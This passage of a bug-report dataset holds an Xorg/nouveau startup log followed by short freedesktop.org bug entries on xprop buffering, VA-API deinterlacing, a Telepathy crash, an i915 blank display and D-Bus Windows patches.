[   165.470] Initializing built-in extension BIG-REQUESTS
[   165.470] Initializing built-in extension SYNC
[   165.470] Initializing built-in extension XKEYBOARD
[   165.470] Initializing built-in extension XC-MISC
[   165.470] Initializing built-in extension XINERAMA
[   165.470] Initializing built-in extension XFIXES
[   165.470] Initializing built-in extension RENDER
[   165.470] Initializing built-in extension RANDR
[   165.470] Initializing built-in extension COMPOSITE
[   165.470] Initializing built-in extension DAMAGE
[   165.471] Initializing built-in extension MIT-SCREEN-SAVER
[   165.471] Initializing built-in extension DOUBLE-BUFFER
[   165.471] Initializing built-in extension RECORD
[   165.471] Initializing built-in extension DPMS
[   165.471] Initializing built-in extension X-Resource
[   165.471] Initializing built-in extension XVideo
[   165.471] Initializing built-in extension XVideo-MotionCompensation
[   165.471] Initializing built-in extension SELinux
[   165.472] Initializing built-in extension XFree86-VidModeExtension
[   165.472] Initializing built-in extension XFree86-DGA
[   165.472] Initializing built-in extension XFree86-DRI
[   165.472] Initializing built-in extension DRI2
[   165.472] (II) LoadModule: glx
[   165.527] (II) Loading /usr/lib64/xorg/modules/extensions/libglx.so
[   165.541] (II) Module glx: vendor=X.Org Foundation
[   165.541]    compiled for 1.12.99.902 module version = 1.0.0
[   165.541]    ABI class: X.Org Server Extension version 6.0
[   165.541] (==) AIGLX enabled
[   165.542] Loading extension GLX
[   165.542] (==) Matched nouveau as autoconfigured driver 0
[   165.542] (==) Matched nv as autoconfigured driver 1
[   165.542] (==) Matched nouveau as autoconfigured driver 2
[   165.542] (==) Matched nv as autoconfigured driver 3
[   165.542] (==) Matched vesa as autoconfigured driver 4
[   165.542] (==) Matched modesetting as autoconfigured driver 5
[   165.542] (==) Matched fbdev as autoconfigured driver 6
[   165.542] (==) Assigned the driver to the xf86ConfigLayout
[   165.542] (II) LoadModule: nouveau
[   165.543] (II) Loading /usr/lib64/xorg/modules/drivers/nouveau_drv.so
[   165.566] (II) Module nouveau: vendor=X.Org Foundation
[   165.567]    compiled for 1.12.99.902 module version = 1.0.1
[   165.567]    Module class: X.Org Video Driver
[   165.567]    ABI class: X.Org Video Driver version 13.0
[   165.567] (II) LoadModule: nv
[   165.570] (WW) Warning couldn't open module nv
[   165.570] (II) UnloadModule: nv
[   165.570] (II) Unloading nv
[   165.570] (EE) Failed to load module nv (module does not exist 0)
[   165.571] (II) LoadModule: vesa
[   165.573] (WW) Warning couldn't open module vesa
[   165.573] (II) UnloadModule: vesa
[   165.573] (II) Unloading vesa
[   165.573] (EE) Failed to load module vesa (module does not exist 0)
[   165.573] (II) LoadModule: modesetting
[   165.574] (WW) Warning couldn't open module modesetting
[   165.574] (II) UnloadModule: modesetting
[   165.574] (II) Unloading modesetting
[   165.574] (EE) Failed to load module modesetting (module does not exist 0)
[   165.574] (II) LoadModule: fbdev
[   165.576] (WW) Warning couldn't open module fbdev
[   165.576] (II) UnloadModule: fbdev
[   165.576] (II) Unloading fbdev
[   165.576] (EE) Failed to load module fbdev (module does not exist 0)
[   165.576] (II) NOUVEAU driver
[   165.576] (II) NOUVEAU driver for NVIDIA chipset families :
[   165.576]    RIVA TNT        (NV04)
[   165.576]    RIVA TNT2       (NV05)
[   165.576]    GeForce 256     (NV10)
[   165.576]    GeForce 2       (NV11 NV15)
[   165.577]    GeForce 4MX     (NV17 NV18)
[   165.577]    GeForce 3       (NV20)
[   165.577]    GeForce 4Ti     (NV25 NV28)
[   165.577]    GeForce FX      (NV3x)
[   165.577]    GeForce 6       (NV4x)
[   165.577]    GeForce 7       (G7x)
[   165.578]    GeForce 8       (G8x)
[   165.578]    GeForce GTX 200 (NVA0)
[   165.578]    GeForce GTX 400 (NVC0)
[   165.578] (--) using VT number 3
[   165.585] (II) [drm] nouveau interface version: 1.0.0
[   165.586] (II) Loading sub module dri
[   165.586] (II) LoadModule: dri
[   165.587] (II) Module dri already built-in
[   165.587] (II) NOUVEAU(0): Loaded DRI module
[   165.588] (II) [drm] DRM interface version 1.4
[   165.589] (II) [drm] DRM open master succeeded.
[   165.589] (--) NOUVEAU(0): Chipset: NVIDIA NVa3
[   165.589] (II) NOUVEAU(0): Creating default Display subsection in Screen section
        Default Screen Section for depth/fbbpp 24/32
[   165.589] (==) NOUVEAU(0): Depth 24 (--) framebuffer bpp 32
[   165.589] (==) NOUVEAU(0): RGB weight 888
[   165.589] (==) NOUVEAU(0): Default visual is TrueColor
[   165.589] (==) NOUVEAU(0): Using HW cursor
[   165.589] (==) NOUVEAU(0): GLX sync to VBlank disabled.
[   165.589] (==) NOUVEAU(0): Page flipping enabled
[   165.589] (==) NOUVEAU(0): Swap limit set to 2 [Max allowed 2]
[   165.713] (II) NOUVEAU(0): Output LVDS-1 has no monitor section
[   165.806] (II) NOUVEAU(0): Output VGA-1 has no monitor section
[   165.809] (II) NOUVEAU(0): Output HDMI-1 has no monitor section
[   165.873] (II) NOUVEAU(0): Output DP-1 has no monitor section
[   165.931] (II) NOUVEAU(0): EDID for output LVDS-1
[   165.931] (II) NOUVEAU(0): Manufacturer: SEC  Model: 324b  Serial#: 0
[   165.931] (II) NOUVEAU(0): Year: 2008  Week: 0
[   165.931] (II) NOUVEAU(0): EDID Version: 1.3
[   165.931] (II) NOUVEAU(0): Digital Display Input
[   165.931] (II) NOUVEAU(0): Max Image Size [cm]: horiz.: 41  vert.: 23
[   165.931] (II) NOUVEAU(0): Gamma: 2.20
[   165.931] (II) NOUVEAU(0): No DPMS capabilities specified
[   165.931] (II) NOUVEAU(0): Supported color encodings: RGB 4:4:4 YCrCb 4:4:4
[   165.931] (II) NOUVEAU(0): First detailed timing is preferred mode
[   165.931] (II) NOUVEAU(0): redX: 0.588 redY: 0.340   greenX: 0.330 greenY: 0.537
[   165.931] (II) NOUVEAU(0): blueX: 0.151 blueY: 0.122   whiteX: 0.313 whiteY: 0.329
[   165.931] (II) NOUVEAU(0): Manufacturer's mask: 0
[   165.932] (II) NOUVEAU(0): Supported detailed timing:
[   165.932] (II) NOUVEAU(0): clock: 121.7 MHz   Image Size:  409 x 230 mm
[   165.932] (II) NOUVEAU(0): h_active: 1680  h_sync: 1728  h_sync_end 1760 h_blank_end 2080 h_border: 0
[   165.932] (II) NOUVEAU(0): v_active: 945  v_sync: 947  v_sync_end 953 v_blanking: 975 v_border: 0
[   165.932] (II) NOUVEAU(0): Unknown vendor-specific block f
[   165.932] (II) NOUVEAU(0):  SAMSUNG
[   165.932] (II) NOUVEAU(0):  LTN184KT02T01
[   165.932] (II) NOUVEAU(0): EDID (in hex):
[   165.932] (II) NOUVEAU(0):   00ffffffffffff004ca34b3200000000
[   165.932] (II) NOUVEAU(0):   00120103802917780a8ad59657548926
[   165.932] (II) NOUVEAU(0):   1f505400000001010101010101010101
[   165.932] (II) NOUVEAU(0):   010101010101882f909061b11e303020
[   165.932] (II) NOUVEAU(0):   260099e6100000190000000f00000000
[   165.932] (II) NOUVEAU(0):   000000000032a0051b00000000fe0053
[   165.932] (II) NOUVEAU(0):   414d53554e470a2020202020000000fe
[   165.932] (II) NOUVEAU(0):   004c544e3138344b54303254303100c5
[   165.932] (II) NOUVEAU(0): EDID vendor SEC prod id 12875
[   165.932] (II) NOUVEAU(0): Printing DDC gathered Modelines:
[   165.932] (II) NOUVEAU(0): Modeline 1680x945x0.0  121.68  1680 1728 1760 2080  945 947 953 975 -hsync -vsync (58.5 kHz eP)
[   165.933] (II) NOUVEAU(0): Printing probed modes for output LVDS-1
[   165.933] (II) NOUVEAU(0): Modeline 1680x945x60.0  121.68  1680 1728 1760 2080  945 947 953 975 -hsync -vsync (58.5 kHz eP)
[   165.933] (II) NOUVEAU(0): Modeline 1152x864x60.0   81.75  1152 1216 1336 1520  864 867 871 897 -hsync +vsync (53.8 kHz e)
[   165.933] (II) NOUVEAU(0): Modeline 1024x768x59.9   63.50  1024 1072 1176 1328  768 771 775 798 -hsync +vsync (47.8 kHz e)
[   165.933] (II) NOUVEAU(0): Modeline 800x600x59.9   38.25  800 832 912 1024  600 603 607 624 -hsync +vsync (37.4 kHz e)
[   165.933] (II) NOUVEAU(0): Modeline 640x480x59.4   23.75  640 664 720 800  480 483 487 500 -hsync +vsync (29.7 kHz e)
[   165.933] (II) NOUVEAU(0): Modeline 720x400x59.6   22.25  720 744 808 896  400 403 413 417 -hsync +vsync (24.8 kHz e)
[   165.933] (II) NOUVEAU(0): Modeline 640x400x60.0   20.00  640 664 720 800  400 403 409 417 -hsync +vsync (25.0 kHz e)
[   165.933] (II) NOUVEAU(0): Modeline 640x350x59.8   17.50  640 664 720 800  350 353 363 366 -hsync +vsync (21.9 kHz e)
[   166.025] (II) NOUVEAU(0): EDID for output VGA-1
[   166.028] (II) NOUVEAU(0): EDID for output HDMI-1
[   166.092] (II) NOUVEAU(0): EDID for output DP-1
[   166.092] (II) NOUVEAU(0): Output LVDS-1 connected
[   166.092] (II) NOUVEAU(0): Output VGA-1 disconnected
[   166.092] (II) NOUVEAU(0): Output HDMI-1 disconnected
[   166.092] (II) NOUVEAU(0): Output DP-1 disconnected
[   166.092] (II) NOUVEAU(0): Using exact sizes for initial modes
[   166.092] (II) NOUVEAU(0): Output LVDS-1 using initial mode 1680x945 +0+0
[   166.092] (II) NOUVEAU(0): Using default gamma of (1.0 1.0 1.0) unless otherwise stated.
[   166.093] (--) NOUVEAU(0): Virtual size is 1680x945 (pitch 0)
[   166.093] (**) NOUVEAU(0):  Driver mode 1680x945: 121.7 MHz (scaled from 0.0 MHz) 58.5 kHz 60.0 Hz
[   166.093] (II) NOUVEAU(0): Modeline 1680x945x60.0  121.68  1680 1728 1760 2080  945 947 953 975 -hsync -vsync (58.5 kHz eP)
[   166.093] (**) NOUVEAU(0):  Driver mode 1152x864: 81.8 MHz (scaled from 0.0 MHz) 53.8 kHz 60.0 Hz
[   166.093] (II) NOUVEAU(0): Modeline 1152x864x60.0   81.75  1152 1216 1336 1520  864 867 871 897 -hsync +vsync (53.8 kHz e)
[   166.093] (**) NOUVEAU(0):  Driver mode 1024x768: 63.5 MHz (scaled from 0.0 MHz) 47.8 kHz 59.9 Hz
[   166.093] (II) NOUVEAU(0): Modeline 1024x768x59.9   63.50  1024 1072 1176 1328  768 771 775 798 -hsync +vsync (47.8 kHz e)
[   166.093] (**) NOUVEAU(0):  Driver mode 800x600: 38.2 MHz (scaled from 0.0 MHz) 37.4 kHz 59.9 Hz
[   166.094] (II) NOUVEAU(0): Modeline 800x600x59.9   38.25  800 832 912 1024  600 603 607 624 -hsync +vsync (37.4 kHz e)
[   166.094] (**) NOUVEAU(0):  Driver mode 640x480: 23.8 MHz (scaled from 0.0 MHz) 29.7 kHz 59.4 Hz
[   166.094] (II) NOUVEAU(0): Modeline 640x480x59.4   23.75  640 664 720 800  480 483 487 500 -hsync +vsync (29.7 kHz e)
[   166.094] (**) NOUVEAU(0):  Driver mode 720x400: 22.2 MHz (scaled from 0.0 MHz) 24.8 kHz 59.6 Hz
[   166.094] (II) NOUVEAU(0): Modeline 720x400x59.6   22.25  720 744 808 896  400 403 413 417 -hsync +vsync (24.8 kHz e)
[   166.094] (**) NOUVEAU(0):  Driver mode 640x400: 20.0 MHz (scaled from 0.0 MHz) 25.0 kHz 60.0 Hz
[   166.094] (II) NOUVEAU(0): Modeline 640x400x60.0   20.00  640 664 720 800  400 403 409 417 -hsync +vsync (25.0 kHz e)
[   166.094] (**) NOUVEAU(0):  Driver mode 640x350: 17.5 MHz (scaled from 0.0 MHz) 21.9 kHz 59.8 Hz
[   166.094] (II) NOUVEAU(0): Modeline 640x350x59.8   17.50  640 664 720 800  350 353 363 366 -hsync +vsync (21.9 kHz e)
[   166.095] (**) NOUVEAU(0): Display dimensions: (410 230) mm
[   166.095] (**) NOUVEAU(0): DPI set to (104 104)
[   166.095] (II) Loading sub module fb
[   166.095] (II) LoadModule: fb
[   166.096] (II) Loading /usr/lib64/xorg/modules/libfb.so
[   166.133] (II) Module fb: vendor=X.Org Foundation
[   166.134]    compiled for 1.12.99.902 module version = 1.0.0
[   166.134]    ABI class: X.Org ANSI C Emulation version 0.4
[   166.134] (II) Loading sub module exa
[   166.134] (II) LoadModule: exa
[   166.135] (II) Loading /usr/lib64/xorg/modules/libexa.so
[   166.174] (II) Module exa: vendor=X.Org Foundation
[   166.174]    compiled for 1.12.99.902 module version = 2.6.0
[   166.174]    ABI class: X.Org Video Driver version 13.0
[   166.174] (II) Loading sub module shadowfb
[   166.174] (II) LoadModule: shadowfb
[   166.175] (II) Loading /usr/lib64/xorg/modules/libshadowfb.so
[   166.198] (II) Module shadowfb: vendor=X.Org Foundation
[   166.198]    compiled for 1.12.99.902 module version = 1.0.0
[   166.198]    ABI class: X.Org ANSI C Emulation version 0.4
[   166.198] (--) Depth 24 pixmap format is 32 bpp
[   166.198] (EE) NOUVEAU(0): Error creating GPU channel: -19
[   166.198] (EE) NOUVEAU(0): Error initialising acceleration.  Falling back to NoAccel
[   166.212] (==) NOUVEAU(0): Backing store disabled
[   166.212] (==) NOUVEAU(0): Silken mouse enabled
[   166.212] (==) NOUVEAU(0): DPMS enabled
[   166.212] (II) NOUVEAU(0): RandR 1.2 enabled ignore the following RandR disabled message.
[   166.232] (--) RandR disabled
[   166.241] (II) SELinux: Disabled on system
[   166.243] (II) AIGLX: Screen 0 is not DRI2 capable
[   166.243] (II) AIGLX: Screen 0 is not DRI capable
[   166.897] (II) AIGLX: Loaded and initialized swrast
[   166.897] (II) GLX: Initialized DRISWRAST GL provider for screen 0
[   166.904] (II) NOUVEAU(0): NVEnterVT is called.
[   166.914] (II) NOUVEAU(0): Setting screen physical size to 444 x 250
[   166.914] resize called 1680 945
[   167.780] (II) config/udev: Adding input device Power Button (/dev/input/event2)
[   167.780] (**) Power Button: Applying InputClass evdev keyboard catchall
[   167.780] (II) LoadModule: evdev
[   167.781] (II) Loading /usr/lib64/xorg/modules/input/evdev_drv.so
[   167.826] (II) Module evdev: vendor=X.Org Foundation
[   167.826]    compiled for 1.12.99.902 module version = 2.7.0
[   167.826]    Module class: X.Org XInput Driver
[   167.826]    ABI class: X.Org XInput driver version 18.0
[   167.826] (II) Using input driver 'evdev' for 'Power Button'
[   167.826] (**) Power Button: always reports core events
[   167.826] (**) evdev: Power Button: Device: /dev/input/event2
[   167.827] (--) evdev: Power Button: Vendor 0 Product 0x1
[   167.827] (--) evdev: Power Button: Found keys
[   167.827] (II) evdev: Power Button: Configuring as keyboard
[   167.827] (**) Option config_info udev:/sys/devices/LNXSYSTM:00/LNXPWRBN:00/input/input2/event2
[   167.827] (II) XINPUT: Adding extended input device Power Button (type: KEYBOARD id 6)
[   167.827] (**) Option xkb_rules evdev
[   167.827] (**) Option xkb_model evdev
[   167.827] (**) Option xkb_layout us
[   167.872] (II) config/udev: Adding input device Video Bus (/dev/input/event5)
[   167.872] (**) Video Bus: Applying InputClass evdev keyboard catchall
[   167.872] (II) Using input driver 'evdev' for 'Video Bus'
[   167.872] (**) Video Bus: always reports core events
[   167.872] (**) evdev: Video Bus: Device: /dev/input/event5
[   167.873] (--) evdev: Video Bus: Vendor 0 Product 0x6
[   167.873] (--) evdev: Video Bus: Found keys
[   167.873] (II) evdev: Video Bus: Configuring as keyboard
[   167.873] (**) Option config_info udev:/sys/devices/LNXSYSTM:00/device:00/PNP0A08:00/device:0e/LNXVIDEO:02/input/input5/event5
[   167.873] (II) XINPUT: Adding extended input device Video Bus (type: KEYBOARD id 7)
[   167.873] (**) Option xkb_rules evdev
[   167.873] (**) Option xkb_model evdev
[   167.874] (**) Option xkb_layout us
[   167.875] (II) config/udev: Adding input device Power Button (/dev/input/event0)
[   167.875] (**) Power Button: Applying InputClass evdev keyboard catchall
[   167.875] (II) Using input driver 'evdev' for 'Power Button'
[   167.875] (**) Power Button: always reports core events
[   167.875] (**) evdev: Power Button: Device: /dev/input/event0
[   167.875] (--) evdev: Power Button: Vendor 0 Product 0x1
[   167.875] (--) evdev: Power Button: Found keys
[   167.875] (II) evdev: Power Button: Configuring as keyboard
[   167.875] (**) Option config_info udev:/sys/devices/LNXSYSTM:00/device:00/PNP0C0C:00/input/input0/event0
[   167.876] (II) XINPUT: Adding extended input device Power Button (type: KEYBOARD id 8)
[   167.876] (**) Option xkb_rules evdev
[   167.876] (**) Option xkb_model evdev
[   167.876] (**) Option xkb_layout us
[   167.877] (II) config/udev: Adding input device Lid Switch (/dev/input/event1)
[   167.877] (II) No input driver specified ignoring this device.
[   167.877] (II) This device may have been added with another device file.
[   167.877] (II) config/udev: Adding drm device (/dev/dri/card0)
[   167.879] (II) config/udev: Adding input device HDA NVidia HDMI/DPpcm=8 (/dev/input/event10)
[   167.880] (II) No input driver specified ignoring this device.
[   167.880] (II) This device may have been added with another device file.
[   167.881] (II) config/udev: Adding input device HDA NVidia HDMI/DPpcm=7 (/dev/input/event11)
[   167.881] (II) No input driver specified ignoring this device.
[   167.881] (II) This device may have been added with another device file.
[   167.882] (II) config/udev: Adding input device HDA NVidia HDMI/DPpcm=3 (/dev/input/event12)
[   167.882] (II) No input driver specified ignoring this device.
[   167.882] (II) This device may have been added with another device file.
[   167.883] (II) config/udev: Adding input device HDA NVidia HDMI/DPpcm=9 (/dev/input/event9)
[   167.883] (II) No input driver specified ignoring this device.
[   167.883] (II) This device may have been added with another device file.
[   167.884] (II) config/udev: Adding input device Logitech USB Optical Mouse (/dev/input/event6)
[   167.884] (**) Logitech USB Optical Mouse: Applying InputClass evdev pointer catchall
[   167.884] (II) Using input driver 'evdev' for 'Logitech USB Optical Mouse'
[   167.884] (**) Logitech USB Optical Mouse: always reports core events
[   167.884] (**) evdev: Logitech USB Optical Mouse: Device: /dev/input/event6
[   167.884] (--) evdev: Logitech USB Optical Mouse: Vendor 0x46d Product 0xc018
[   167.884] (--) evdev: Logitech USB Optical Mouse: Found 3 mouse buttons
[   167.884] (--) evdev: Logitech USB Optical Mouse: Found scroll wheel(s)
[   167.884] (--) evdev: Logitech USB Optical Mouse: Found relative axes
[   167.885] (--) evdev: Logitech USB Optical Mouse: Found x and y relative axes
[   167.885] (II) evdev: Logitech USB Optical Mouse: Configuring as mouse
[   167.885] (II) evdev: Logitech USB Optical Mouse: Adding scrollwheel support
[   167.885] (**) evdev: Logitech USB Optical Mouse: YAxisMapping: buttons 4 and 5
[   167.885] (**) evdev: Logitech USB Optical Mouse: EmulateWheelButton: 4 EmulateWheelInertia: 10 EmulateWheelTimeout: 200
[   167.885] (**) Option config_info udev:/sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.3/1-1.3:1.0/input/input6/event6
[   167.885] (II) XINPUT: Adding extended input device Logitech USB Optical Mouse (type: MOUSE id 9)
[   167.885] (II) evdev: Logitech USB Optical Mouse: initialized for relative axes.
[   167.885] (**) Logitech USB Optical Mouse: (accel) keeping acceleration scheme 1
[   167.885] (**) Logitech USB Optical Mouse: (accel) acceleration profile 0
[   167.885] (**) Logitech USB Optical Mouse: (accel) acceleration factor: 2.000
[   167.886] (**) Logitech USB Optical Mouse: (accel) acceleration threshold: 4
[   167.887] (II) config/udev: Adding input device Logitech USB Optical Mouse (/dev/input/mouse1)
[   167.887] (II) No input driver specified ignoring this device.
[   167.887] (II) This device may have been added with another device file.
[   167.888] (II) config/udev: Adding input device USB2.0 UVC WebCam (/dev/input/event8)
[   167.888] (**) USB2.0 UVC WebCam: Applying InputClass evdev keyboard catchall
[   167.888] (II) Using input driver 'evdev' for 'USB2.0 UVC WebCam'
[   167.888] (**) USB2.0 UVC WebCam: always reports core events
[   167.888] (**) evdev: USB2.0 UVC WebCam: Device: /dev/input/event8
[   167.888] (--) evdev: USB2.0 UVC WebCam: Vendor 0x4f2 Product 0xb130
[   167.888] (--) evdev: USB2.0 UVC WebCam: Found keys
[   167.888] (II) evdev: USB2.0 UVC WebCam: Configuring as keyboard
[   167.888] (**) Option config_info udev:/sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.1/2-1.1:1.0/input/input8/event8
[   167.888] (II) XINPUT: Adding extended input device USB2.0 UVC WebCam (type: KEYBOARD id 10)
[   167.888] (**) Option xkb_rules evdev
[   167.889] (**) Option xkb_model evdev
[   167.889] (**) Option xkb_layout us
[   167.890] (II) config/udev: Adding input device AT Translated Set 2 keyboard (/dev/input/event3)
[   167.890] (**) AT Translated Set 2 keyboard: Applying InputClass evdev keyboard catchall
[   167.890] (II) Using input driver 'evdev' for 'AT Translated Set 2 keyboard'
[   167.890] (**) AT Translated Set 2 keyboard: always reports core events
[   167.890] (**) evdev: AT Translated Set 2 keyboard: Device: /dev/input/event3
[   167.890] (--) evdev: AT Translated Set 2 keyboard: Vendor 0x1 Product 0x1
[   167.890] (--) evdev: AT Translated Set 2 keyboard: Found keys
[   167.890] (II) evdev: AT Translated Set 2 keyboard: Configuring as keyboard
[   167.890] (**) Option config_info udev:/sys/devices/platform/i8042/serio0/input/input3/event3
[   167.891] (II) XINPUT: Adding extended input device AT Translated Set 2 keyboard (type: KEYBOARD id 11)
[   167.891] (**) Option xkb_rules evdev
[   167.891] (**) Option xkb_model evdev
[   167.891] (**) Option xkb_layout us
[   167.892] (II) config/udev: Adding input device SynPS/2 Synaptics TouchPad (/dev/input/event4)
[   167.892] (**) SynPS/2 Synaptics TouchPad: Applying InputClass evdev touchpad catchall
[   167.892] (II) Using input driver 'evdev' for 'SynPS/2 Synaptics TouchPad'
[   167.892] (**) SynPS/2 Synaptics TouchPad: always reports core events
[   167.892] (**) evdev: SynPS/2 Synaptics TouchPad: Device: /dev/input/event4
[   167.893] (--) evdev: SynPS/2 Synaptics TouchPad: Vendor 0x2 Product 0x7
[   167.893] (--) evdev: SynPS/2 Synaptics TouchPad: Found 3 mouse buttons
[   167.893] (--) evdev: SynPS/2 Synaptics TouchPad: Found absolute axes
[   167.893] (--) evdev: SynPS/2 Synaptics TouchPad: Found absolute multitouch axes
[   167.893] (--) evdev: SynPS/2 Synaptics TouchPad: Found x and y absolute axes
[   167.893] (--) evdev: SynPS/2 Synaptics TouchPad: Found absolute touchpad.
[   167.893] (II) evdev: SynPS/2 Synaptics TouchPad: Configuring as touchpad
[   167.893] (**) evdev: SynPS/2 Synaptics TouchPad: YAxisMapping: buttons 4 and 5
[   167.893] (**) evdev: SynPS/2 Synaptics TouchPad: EmulateWheelButton: 4 EmulateWheelInertia: 10 EmulateWheelTimeout: 200
[   167.893] (**) Option config_info udev:/sys/devices/platform/i8042/serio4/input/input4/event4
[   167.893] (II) XINPUT: Adding extended input device SynPS/2 Synaptics TouchPad (type: TOUCHPAD id 12)
[   167.893] (II) evdev: SynPS/2 Synaptics TouchPad: initialized for absolute axes.
[   167.894] (**) SynPS/2 Synaptics TouchPad: (accel) keeping acceleration scheme 1
[   167.894] (**) SynPS/2 Synaptics TouchPad: (accel) acceleration profile 0
[   167.894] (**) SynPS/2 Synaptics TouchPad: (accel) acceleration factor: 2.000
[   167.894] (**) SynPS/2 Synaptics TouchPad: (accel) acceleration threshold: 4
[   167.895] (II) config/udev: Adding input device SynPS/2 Synaptics TouchPad (/dev/input/mouse0)
[   167.895] (II) No input driver specified ignoring this device.
[   167.895] (II) This device may have been added with another device file.
[   167.897] (II) config/udev: Adding input device Toshiba input device (/dev/input/event7)
[   167.897] (**) Toshiba input device: Applying InputClass evdev keyboard catchall
[   167.897] (II) Using input driver 'evdev' for 'Toshiba input device'
[   167.897] (**) Toshiba input device: always reports core events
[   167.897] (**) evdev: Toshiba input device: Device: /dev/input/event7
[   167.897] (--) evdev: Toshiba input device: Vendor 0 Product 0
[   167.897] (--) evdev: Toshiba input device: Found keys
[   167.897] (II) evdev: Toshiba input device: Configuring as keyboard
[   167.898] (**) Option config_info udev:/sys/devices/virtual/input/input7/event7
[   167.898] (II) XINPUT: Adding extended input device Toshiba input device (type: KEYBOARD id 13)
[   167.898] (**) Option xkb_rules evdev
[   167.898] (**) Option xkb_model evdev
[   167.898] (**) Option xkb_layout us
[   178.737] (II) NOUVEAU(0): EDID vendor SEC prod id 12875
[   178.737] (II) NOUVEAU(0): Printing DDC gathered Modelines:
[   178.737] (II) NOUVEAU(0): Modeline 1680x945x0.0  121.68  1680 1728 1760 2080  945 947 953 975 -hsync -vsync (58.5 kHz eP)
[   186.983] (II) NOUVEAU(0): EDID vendor SEC prod id 12875
[   186.984] (II) NOUVEAU(0): Printing DDC gathered Modelines:
[   186.984] (II) NOUVEAU(0): Modeline 1680x945x0.0  121.68  1680 1728 1760 2080  945 947 953 975 -hsync -vsync (58.5 kHz eP)
[   187.223] (II) NOUVEAU(0): EDID vendor SEC prod id 12875
[   187.223] (II) NOUVEAU(0): Printing DDC gathered Modelines:
[   187.223] (II) NOUVEAU(0): Modeline 1680x945x0.0  121.68  1680 1728 1760 2080  945 947 953 975 -hsync -vsync (58.5 kHz eP)
the kernel that I'm running is (because of other reported errors under the 3.5.0 kernel with nouveau that keeps me from being able to run the 3.5.0 kernel):
3.4.0-0.rc7.git6.1.fc18.x86_64
I've attached a dmesg with the drm information</t>
  </si>
  <si>
    <t>ktmdms</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-93113</t>
  </si>
  <si>
    <t>request a new account on freedestop.org</t>
  </si>
  <si>
    <t>Created attachment 120129
ssh public key</t>
  </si>
  <si>
    <t>XORG-16154</t>
  </si>
  <si>
    <t>xprop -spy does not flush output</t>
  </si>
  <si>
    <t>Created attachment 16813
Patch to add flushing to xprop -spy
When piping the output of xprop -spy into a script the output is buffered and so the script does not see property changes immediately.  This does not show up when xprop -spy is run from a tty since then the output is unbuffered by default.
The fix is simple just fflush(stdout) when entering spy mode and after outputting each property a patch is attached.</t>
  </si>
  <si>
    <t>kev</t>
  </si>
  <si>
    <t>LIBVA-79765</t>
  </si>
  <si>
    <t>MADI deinterlacer produces artifacts and bad quality</t>
  </si>
  <si>
    <t>Created attachment 100593
Madi deinterlacing showing artifacts
As we are currently implementing VPP into xbmc via: and: I made some quality tests in comparing MADI with BOB and a state of the art yadif deinterlacer. It seems that MADI in VPP propagates artifacts from between the reference frames and make especially test looking quite bad.
I used the famous burosch samples for comparing. Screenshots are attached.
Program used gst-launch with gstreamer-vaapi-plugins 0.4.</t>
  </si>
  <si>
    <t>pengfei.qu</t>
  </si>
  <si>
    <t>TELEPATHY-21996</t>
  </si>
  <si>
    <t>Crashes if you poke Hold or CallStates before RequestStreams</t>
  </si>
  <si>
    <t>The Hold and CallStates code assumes that a media channel has a JingleSession. This is not true before you actually initiate the call.
It's not immediately clear to me what should happen if you RequestHold() on an uninitiated call. Should it fail? Or should it succeed and send  as soon as you initiate?
Regardless calling GetCallStates and RequestHold does crash Gabble I'd like to fix this before releasing 0.7.28 so setting this bug to blocker.</t>
  </si>
  <si>
    <t>DRI-96923</t>
  </si>
  <si>
    <t>Black display once loading the module i915 on Bay trail (DSI/MIPI) - Zen10 tablet</t>
  </si>
  <si>
    <t>Created attachment 125061
The i915_vbt debugfs dump
After fixing the PWM backlight of this LPSS system (bug 96571) I get a black screen once I load the i915 module. Before it (efi fb) it displays fine.
I'm using Shobhit patches for enabling the PWM plus another one in the referred bug over 4.5 and 4.6.3 with the same outcome: backlight works great the pixels get all black after a quick flicker at module loading.
I notice from the drm debugfs that the lcd panel is connected with DSI. The LCD panel acording to the BIOS setting for MIPI panel is an Innolux 8x12 (10.1 800x1280) like this:
http://www.innolux.com/Pages/Dyn/Product3_EN.aspx?cateN=Tablet%20Hybrid%20Solution&amp;catedes=Tablet/Hybrid%20Solution&amp;catel1=Tablet&amp;catel2=WXGA&amp;size=10.1&amp;Language=EN
The i915 module does not seem to know an EDID for the panel but has a VBT that I will attach.
The dmesg content at the time of i915 loading is this:
[   72.226417] Linux agpgart interface v0.103
[   72.265453] [drm] Initialized drm 1.1.0 20060810
[   72.384656] [drm] Memory usable by graphics device = 2048M
[   72.384666] checking generic (80000000 1d5000) vs hw (80000000 10000000)
[   72.384669] fb: switching to inteldrmfb from EFI VGA
[   72.384773] Console: switching to colour dummy device 80x25
[   72.384904] [drm] Replacing VGA console driver
[   72.385680] [drm] Supports vblank timestamp caching Rev 2 (21.10.2013).
[   72.385686] [drm] Driver supports precise vblank timestamp query.
[   72.407090] vgaarb: device changed decodes: PCI:0000:00:02.0olddecodes=io+memdecodes=io+mem:owns=io+mem
[   72.465860] ACPI: Video Device [GFX0] (multi-head: yes  rom: no  post: no)
[   72.466436] input: Video Bus as /devices/LNXSYSTM:00/LNXSYBUS:00/PNP0A08:00/LNXVIDEO:00/input/input6
[   72.466663] [drm] Initialized i915 1.6.0 20160229 for 0000:00:02.0 on minor 0
[   72.508911] audit: type=1130 audit(1468319461.361:75): pid=1 uid=0 auid=4294967295 ses=4294967295 msg='unit=systemd-backlight@backlight:intel_backlight comm=systemd exe=/nix/store/24qss832pv2xwpjbzk354kimypf4f1jc-systemd-230/lib/systemd/systemd hostname=? addr=? terminal=? res=success'
[   72.695713] fbcon: inteldrmfb (fb0) is primary device
[   74.649688] Console: switching to colour frame buffer device 100x80
[   74.660835] i915 0000:00:02.0: fb0: inteldrmfb frame buffer device
The Memory usable by graphics device seems to be all RAM available in the system 2GiB.</t>
  </si>
  <si>
    <t>viric</t>
  </si>
  <si>
    <t>DBUS-25213</t>
  </si>
  <si>
    <t>merge in windows patches in upstream dbus</t>
  </si>
  <si>
    <t>Created attachment 31367
initial patch from Tor Lillqvist
This bug is an initial request for merging in the patches from Tor Lillqvist. He wrote: 
I spent some hours cherry-picking most of the commits from the
dbus4win-noncetcp branch of the dbus4win git repository to the master
branch of my local clone of the upstream dbus repository. (Manually
editing when necessary to make the commits apply.) It now builds on
Windows (using MinGW from MSYS using autogen.sh and make) but I
obviously still need to make sure that it also works. Once I am
reasonably confident in it what could/should be done to get it
upstream? (My local git repository is not accessible from the
outside.)</t>
  </si>
  <si>
